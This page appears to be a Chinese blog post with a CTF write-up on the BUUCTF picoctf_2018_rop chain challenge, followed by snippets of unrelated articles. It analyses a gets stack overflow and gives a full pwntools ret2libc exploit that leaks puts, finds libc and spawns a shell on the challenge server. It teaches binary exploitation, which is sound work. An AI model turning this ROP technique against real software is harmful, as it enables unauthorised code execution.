news 2026/5/16 12:21:22

buuctf中的picoctf_2018_rop chain

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
buuctf中的picoctf_2018_rop chain

首先checksec检查保护机制:

-32位程序

-开启了栈不可执行机制

然后使用反汇编工具IDA进行分析:

看到了vuln函数和左边的win1,win2函数及flag函数,第一眼看到就觉得能够从这些函数中获取flag,但实际行不行呢,先一个一个点进去看一下

vuln函数内部:

gets函数可触发栈溢出漏洞,顺便算出偏移为:0x18 + 0x8

win1函数内部;

使变量win1的值为1

win2函数内部:

一些if-else的条件选择语句

最后是flag函数内部:

可以发现要想从这里拿到flag,必须要让win1,win2和a1的值都等于-559039827,但是前面的那几个函数都无法实现,所以这几个函数一点作用也没有,纯糊弄人呢

由于在程序的反汇编代码中没有任何后门函数和system函数地址,题目也没给libc库文件,这里考虑泄露出某个函数的真实的地址再借助LibcSearcher这个插件找到libc库,再计算出libc基址,进而计算出system函数及/bin/sh的地址

先在IDA中拿到vuln函数的地址,方便后面二次使用栈溢出漏洞:0x8048714

然后就可以开始编写exp攻击脚本了:

第一次栈溢出先构造ROP链执行puts函数打印出puts函数的真实地址,拿到后通过LibcSearcher找到libc库,然后计算出libc基址后再计算出system函数和/bin/sh地址,第二次栈溢出执行system函数后就能拿到shell

from pwn import * from LibcSearcher import LibcSearcher context(arch='i386', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',29484) # 与在线环境交互。 offset = 0x18 + 0x4 vuln_addr = 0x8048714 elf = ELF("./pwn") puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] io.recvuntil(b'Enter your input> ') payload = b'a'*offset + p32(puts_plt) + p32(vuln_addr) + p32(puts_got) io.sendline(payload) puts_addr = u32(io.recv(4)) print(hex(puts_addr)) libc = LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") system_addr = libc_base + libc.dump("system") bin_sh_addr = libc_base + libc.dump("str_bin_sh") io.recvuntil(b'Enter your input> ') payload = b'a'*offset + p32(system_addr) + p32(1) + p32(bin_sh_addr) io.sendline(payload) io.interactive()

这是运行结果:

这里要手动选择libc库,32位程序就选择32位的libc库就行,可能会选到不适配得到libc库,多试几个就行了

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/10 4:14:51

MuJoCo: 开源的高性能物理仿真引擎

文章目录🔍 核心特点1. **高效且准确的物理建模**2. **丰富的物理对象与执行器支持**3. **高性能求解与数值方法**4. **易用的建模与可视化**5. **高性能底层实现**🛠️ 典型应用场景📦 使用方式(简要)📚 学…

作者头像 李华
网站建设 2026/5/13 12:18:29

男人宠你的 9 个 “藏不住” 本能反应

别人吐槽你,他立马开启“护犊子”模式,怼人都不带打草稿的👊抱抱时像裹粽子,胳膊勒得比安全带还紧,生怕你跑掉🎐走路自动切换“龟速档”,你走一步他挪半步,主打一个同频贴贴&#x1…

作者头像 李华
网站建设 2026/5/11 21:26:26

看看灵光、秒哒、NoCode、Gemini、iThinkAir各家做应用的效果

一句话生成应用的AI工具已经有很多了,比如:灵光、秒哒、NoCode、Gemini、iThinkAir。这里试试看各家生成应用的效果。 输入这样一句话:做一个漫绘科普的工具应用:“专业术语?画给你看!”,“复杂…

作者头像 李华
网站建设 2026/5/14 16:06:14

如何通过 API 网关实现统一的安全治理

随着微服务架构的普及,企业 API 数量呈指数级增长。然而,安全策略若分散在各个服务中,将导致防护不一致、漏洞难管控、审计难追溯。API 网关作为流量统一入口,是实现安全治理的理想载体。本文介绍如何通过 API 网关构建集中化、标…

作者头像 李华
网站建设 2026/5/14 16:04:54

《时代》2025重塑世界的五大AI进展

2025年注定被载入史册,这一年人工智能成了支撑股市的经济支柱,更成了大国竞争前线重新划界的地缘政治棋子。1月20日Deepseek发布R1模型这一天,成为了全球AI格局的分水岭,它不仅在性能榜单上紧随美国顶尖模型之后排名全球第二&…

作者头像 李华